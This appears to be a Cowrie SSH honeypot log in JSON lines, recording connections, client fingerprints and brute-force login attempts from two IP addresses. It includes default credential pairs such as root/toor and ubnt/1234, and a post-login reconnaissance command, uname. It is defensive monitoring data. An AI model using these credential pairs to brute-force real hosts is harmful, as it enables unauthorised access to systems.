{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:30:28.187844Z","src_ip":"212.227.235.229","session":"7c69f2e6b496"}
{"eventid":"cowrie.login.failed","username":"123","password":"123456","message":"login attempt [123/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:30:29.411327Z","src_ip":"212.227.235.229","session":"7c69f2e6b496"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35274,"dst_ip":"1.2.3.4","dst_port":22,"session":"f62cf2504280","protocol":"ssh","message":"New connection: 212.227.235.229:35274 (1.2.3.4:22) [session: f62cf2504280]","sensor":"my-vps","timestamp":"2025-08-31T06:30:30.544112Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:30.708665Z","src_ip":"212.227.235.229","session":"7c69f2e6b496"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:31.273275Z","src_ip":"212.227.235.229","session":"f62cf2504280"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:30:31.274024Z","src_ip":"212.227.235.229","session":"f62cf2504280"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42232,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f0efd90440","protocol":"ssh","message":"New connection: 212.227.235.229:42232 (1.2.3.4:22) [session: 96f0efd90440]","sensor":"my-vps","timestamp":"2025-08-31T06:30:31.524801Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:30:33.113738Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:30:33.114541Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:33.145126Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:30:33.145797Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:34.507620Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.session.closed","duration":"34.1","message":"Connection lost after 34.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:34.528234Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"letmein","message":"login attempt [tomcat/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:30:37.552811Z","src_ip":"212.227.235.229","session":"f62cf2504280"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:39.361529Z","src_ip":"212.227.235.229","session":"f62cf2504280"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:30:42.694717Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55378,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b090f2605c6","protocol":"ssh","message":"New connection: 212.227.125.160:55378 (1.2.3.4:22) [session: 3b090f2605c6]","sensor":"my-vps","timestamp":"2025-08-31T06:30:49.469402Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53336,"dst_ip":"1.2.3.4","dst_port":22,"session":"82cdba08a387","protocol":"ssh","message":"New connection: 212.227.125.160:53336 (1.2.3.4:22) [session: 82cdba08a387]","sensor":"my-vps","timestamp":"2025-08-31T06:30:52.040265Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:30:52.432164Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:30:52.433131Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:52.553755Z","src_ip":"212.227.125.160","session":"82cdba08a387"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:30:52.554678Z","src_ip":"212.227.125.160","session":"82cdba08a387"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"letmein","message":"login attempt [tomcat/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:30:54.610708Z","src_ip":"212.227.125.160","session":"82cdba08a387"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:56.346160Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:56.347767Z","src_ip":"212.227.125.160","session":"82cdba08a387"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:30:56.395970Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43909,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ae58b96437","protocol":"ssh","message":"New connection: 212.227.235.229:43909 (1.2.3.4:22) [session: a9ae58b96437]","sensor":"my-vps","timestamp":"2025-08-31T06:31:01.949253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:31:01.952087Z","src_ip":"212.227.235.229","session":"a9ae58b96437"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:31:02.170733Z","src_ip":"212.227.235.229","session":"a9ae58b96437"}
{"eventid":"cowrie.login.failed","username":"manish","password":"manish","message":"login attempt [manish/manish] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:03.040996Z","src_ip":"212.227.235.229","session":"a9ae58b96437"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:04.264111Z","src_ip":"212.227.235.229","session":"a9ae58b96437"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"12.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:04.535117Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.session.closed","duration":"33.0","message":"Connection lost after 33.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:04.536442Z","src_ip":"212.227.235.229","session":"96f0efd90440"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":5931,"dst_ip":"1.2.3.4","dst_port":22,"session":"072eb2e16a91","protocol":"ssh","message":"New connection: 212.227.125.160:5931 (1.2.3.4:22) [session: 072eb2e16a91]","sensor":"my-vps","timestamp":"2025-08-31T06:31:22.002940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:31:22.004105Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:31:22.085122Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234","message":"login attempt [ubnt/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:22.491869Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"abcd1234","message":"login attempt [ubnt/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:23.576053Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1111","message":"login attempt [ubnt/1111] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:24.659737Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49734,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa9491b95ec4","protocol":"ssh","message":"New connection: 212.227.235.229:49734 (1.2.3.4:22) [session: fa9491b95ec4]","sensor":"my-vps","timestamp":"2025-08-31T06:31:24.742537Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:25.743270Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:26.826538Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:27.910045Z","src_ip":"212.227.125.160","session":"072eb2e16a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41956,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd2af4bef2cf","protocol":"ssh","message":"New connection: 212.227.235.229:41956 (1.2.3.4:22) [session: cd2af4bef2cf]","sensor":"my-vps","timestamp":"2025-08-31T06:31:30.339595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:31:31.083628Z","src_ip":"212.227.235.229","session":"cd2af4bef2cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:31:31.084548Z","src_ip":"212.227.235.229","session":"cd2af4bef2cf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:31:32.866213Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:31:32.867985Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:31:33.824649Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"welcome","message":"login attempt [tomcat/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:37.119667Z","src_ip":"212.227.235.229","session":"cd2af4bef2cf"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:38.981739Z","src_ip":"212.227.235.229","session":"cd2af4bef2cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:31:41.685727Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:31:41.686702Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"8.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:49.743620Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.session.closed","duration":"60.3","message":"Connection lost after 60.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:49.782939Z","src_ip":"212.227.125.160","session":"3b090f2605c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34946,"dst_ip":"1.2.3.4","dst_port":22,"session":"af71731c6083","protocol":"ssh","message":"New connection: 212.227.235.229:34946 (1.2.3.4:22) [session: af71731c6083]","sensor":"my-vps","timestamp":"2025-08-31T06:31:50.289273Z"}
